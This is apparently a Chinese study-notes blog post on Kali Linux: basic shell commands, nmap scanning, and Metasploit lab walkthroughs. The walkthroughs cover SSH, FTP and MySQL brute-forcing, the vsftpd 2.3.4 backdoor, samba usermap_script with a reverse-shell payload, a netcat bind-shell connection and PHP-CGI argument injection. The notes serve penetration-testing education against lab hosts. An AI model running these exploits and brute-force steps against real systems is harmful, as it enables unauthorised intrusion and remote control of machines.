kali学习与指令总结

时人不识凌云木,直待凌云始道高。这篇文章主要讲述kali学习与指令总结相关的知识,希望能为你提供帮助。
常用文件修改指令
```1、复制命令 cp
用法:# cp 源文件/目标文件夹
将源文件复制到目标文件夹下 如:
cp 1.txt /root/2.txt
将1.txt文件复制到root目录下2.txt
cp -r 复制目录
【kali学习与指令总结】2、删除命令 rm
用法:rm 文件名
rm 1.txt 删除1.txt文件
rm - rf 强制删除文件夹
3、移动、重命名 mv
用法:移动, mv 原文件/目标文件夹
mv 1.txt /root/ 将1.txt移动到root目录下
4.touch user.txt创建user文件

## Linux用户新建 ``` useradd -m username 更改用户名 passwdusername更改用户名的密码 adduser usename 添加用户名 passwd [用户名]更改密码 usermod -a -G sudo username -a仅和-G一块使用,将用户添加到附属组群。 CTRL+Z 强制退出msfconsole工具中

设置kali的ip地址
vim/etc/network/interfaces提取root权限 autoeth0 #开机自动激活 iface eth0 inet static #静态IP address 192.168.1.1 #本机IP netmask 255.255.255.0 #子网掩码 gateway 192.168.1.1 #网关 ------------------------------- /etc/init.d/networking restart 重启网卡服务

SSH远程连接服务
systemctl status ssh先查看开启或未开的状态 systemctl start ssh运行远程服务命令 systemctl enable ssh设置为开机自启的命令 vim /etc/ssh/ssh_config vim是超级链接,etc目录vim前后必须加空格 vi是普通文本 login 登录 prohibit 阻止 permit root login : prohibit-password 不将上面的命令改为yes,只能用dcn用户登录

kali工具介绍
nmap工具的使用 nmap 识别活跃主机 (网络安全扫描) 1.列举网络主机清单 2.管理服务升级调度 3.监控主机 4.服务运行状况 nmap扫描端口状况 -Open(开放的):应用程序正在这个端口上监听连接 -Closed(关闭的):端口对探测做出了响应,但是现在没有应用程序在监听这个端口。 -Filtered(过滤的):端口没有对探测做出响应,但是现在没有应用程序在监听这个端口 -Unfiltered(未被过滤的):端口对探测做出来响应,但是Nmap无法确定它们是关闭还是开放。 -Open/Filtered:端口被过滤或者是开放的,Nmap无法做出判断。 -Closed/Filtered:端口被过滤或者是关闭的,Nmap无法做出判断。具体指令 指纹识别 nmap -sP//同于其他的扫描,他只扫描该网段下的端口,不是发现开放端口的 SYN半开放扫描 nmap -sS 1.1.1.1 tcp SYN Scan (sS)//这是一个基本的扫描方式,半开放式扫描因为这种技术使得 Namp不需要通过完整的握手能够获得远程主机的信息 nmap -sV 172.16.208.220 -ox 文件名.txt 将扫描的结果保存在文件名.txt(可以更换扫描方式) nmap -v -sV 172.16.208.0/24 -oA subnet_1 nmap -sV//搜索服务版本信息 nmap -v//详细输出扫描情况 -oA//-oA将数据以图表的形式展现出来 subnet_1//子网的意思 sT TCP扫描 nmap -O 1.1.1.1//扫描目标操作系统 PN NO ping//扫描 nmap -O -PN 192.168.1.1/24 //如果远程主机有防火墙IDS和IPS系统你可以使用-PN命令来确保不ping远程主机因为有时候防火墙会组织掉ping请求,-PN命令 告诉Nmap不用ping远程主机 nmap -A OS//识别,版本探测,脚本扫描和traceroute综合扫描 NSE脚本扫描 nmap --script vuln < target> //(script这个文件名主要放置脚本)漏洞扫描 nmap --script=mysql-brute < target> // mysql爆破(p22为端口号) nmap -p22 --script=ssh-brute 1.1.1.1//ssh爆破 nmap -p21 --script ftp-syst 1.1.1.1//ftp爆破 nmap -p 21 --script ftp-anon.nse -v 192.168.3.23//ftp-anon.nse 检查目标ftp是否允许匿名登录,光能登陆还不够,它还会自动检测目录是否可读写,比如你想快速批量抓一些ftp(视频上演示的是TCP) nmap -sP 172.16.208.0/24//扫描该网段的主机信息 nmap -p 22-30 172.16.208.0/24//指定端口范围扫描该网段下的端口号 UDP服务 nmap -sU 1.1.1.1//用nmap扫描UDP服务 nmap -Pn//端口扫描

metasplit 在kali终端输入msfconsole在kali里搜索searchsploit(精确搜索) 在msf将kali搜索下的漏洞加以搜索 输入指令 use unix/irc... info查找信息 set rhost IP地址 run 运行 whoami展示当前用户名 halt 立刻关机 reboot 立刻重启 back 返回msf工具metasplit meterpreter Meterpreter是Metasploit框架中的一个杀手锏,通常作为利用漏洞后的进攻载荷所使用,双击载荷在触发漏洞后能够返回给一个控制通道 help:查看帮助信息 background:允许用户在后台Meterpreter会话 downland:允许用户从目标主机上下载文件 upload:允许用户上传文件到目标主机 shell:允许用户在目标主机上(仅是Windows主机)运行Windows shell命令 windows运行cmd命令 Linux运行daish session -i:允许用户切换会话 ps:用于捕获目标主机正在运行的任务进程metasplit进行信息搜索(msf) 扫描内容/方法: nmap -v -sV 网络/掩码 -oA 文件名称 nmap -sV 搜索服务版本信息 nmap -v 详细输出扫描情况 -oA -oA将数据以图表的形式展现出来 扫描数据处理: cat subne_1.gnmap | grep 80/open | awk \'{print $2}\' 搜索这个文件中80端口的IP地址数 search portscan 端口扫描 cat /etc/passwd查找所有用户的列表 w 可以查找当前活跃的用户列表 cat /etc/group 查看用户组 userdel 用户 删除用户 userdel -f 连同用户目录一并删除FTP漏洞扫描 search vsftp [vsftp]是FTPserver段上的服务[在2.3.4版本中有漏洞] FTP漏洞扫描 search ftp_version 查找ftp版本{version版本} use exploit/unix/ftp/vsftpd_234_backdoor 搜索mysql数据库 use auxiliary/scanner/mysql/mysql_login 进入这个目录 touch user.txt 生成一个user.txt 创建一个user.txt 写入用户 创建另一个pass.txt 写入密码(随便写入) show options 显示配置 1.set rhosts 172.16.208.0 2.set threads 100 线程数为100 平时为单线程 3.setpass_user/home/dcn/pass/txt 4.setpass_FILE/home/dcn/pass/txt mysql -h 172.16.208.0 -uroot -p mysql -h 【-h选择主机】172.16.208.0-uroot 【uroot提示无密码】 有密码后面加 -p metasploit samba 漏洞 扫描端口 nmap -sV -p 139 445 IP地址 探测目标端口服务版本信息 进入msfconsole 搜索脚本 search samba use exploit/multi/samba/usermap_script配置对应的payload show payloads set payload cmd/unix/reverse set lhost 172.16.208.220 输入本机ip metasploit 弱口令 nmap -sV 172.16.208.215 探测目标IP的端口 nc 172.16.208.215 1524 (1524为端口号)metasploit php cgi 漏洞利用 nmap -sV -p80 172.16.1.1 cd /usrshare/nmap/scripts 进入这个目录之后 ls | grep php-version 筛选搜索这个脚本 在kaili上输入或在msfconsole控制台输入 nmap --script http-php-version -p80 172.16.208.0 查找是否有符合的漏洞use exploit/multi/http/php_cgi_arg_injiection 进行漏洞利用 set rhost 172.16.208.1 exploit 之后进入meterperter会话 ? 可以观看可执行操作 进入这个模式就可以查看目录获取flag值 background 切到后台 sessions 回到先前控制台


    推荐阅读